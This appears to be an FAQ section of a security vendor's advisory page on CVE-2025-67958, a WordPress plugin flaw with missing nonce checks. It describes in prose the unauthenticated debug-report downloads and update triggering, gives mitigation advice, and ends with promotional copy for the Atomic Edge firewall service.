Nonce verification is a security measure that ensures requests are valid and come from authenticated users. It helps prevent Cross-Site Request Forgery (CSRF) attacks by requiring a unique token for each request, which was missing in the vulnerable functions.
What actions can an attacker perform due to this vulnerability?
Specific unauthorized actions
An attacker can download sensitive debug reports containing system information and trigger the plugin’s update process without authentication. These actions can lead to information disclosure and potential system compromise.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept illustrates how an attacker can send a simple HTTP GET request to the vulnerable endpoints. It shows that by including specific parameters, an attacker can successfully download a debug report or initiate an update without any authorization.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the plugin temporarily or restricting access to the WordPress admin area to prevent exploitation until the plugin can be updated.
Where can I find more information about this vulnerability?
Additional resources
For more details about CVE-2025-67958, refer to the official CVE database, security advisories from the plugin developers, or trusted security research sites that provide analysis and updates on vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations